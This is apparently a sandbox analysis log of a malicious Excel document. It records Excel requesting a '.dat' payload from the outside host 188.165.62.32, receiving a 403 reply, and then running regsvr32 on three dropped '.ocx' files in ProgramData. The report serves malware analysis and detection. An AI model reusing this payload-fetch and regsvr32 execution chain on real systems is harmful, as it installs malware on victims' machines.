20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


    Session IDSource IPSource PortDestination IPDestination PortProcess
    2192.168.2.2249167188.165.62.3280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Feb 15, 2022 22:54:57.305991888 CET3OUTGET /6516776391132270.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 188.165.62.32
    Connection: Keep-Alive
    Feb 15, 2022 22:54:57.471396923 CET4INHTTP/1.1 403 Forbidden
    Server: nginx
    Date: Tue, 15 Feb 2022 21:54:57 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:22:55:12
    Start date:15/02/2022
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Imagebase:0x13fd20000
    File size:28253536 bytes
    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:3
    Start time:22:55:17
    Start date:15/02/2022
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 C:\ProgramData\Hroser1.ocx
    Imagebase:0xff4e0000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:4
    Start time:22:55:18
    Start date:15/02/2022
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 C:\ProgramData\Hroser2.ocx
    Imagebase:0xff4e0000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:5
    Start time:22:55:18
    Start date:15/02/2022
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 C:\ProgramData\Hroser3.ocx
    Imagebase:0xff4e0000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    No disassembly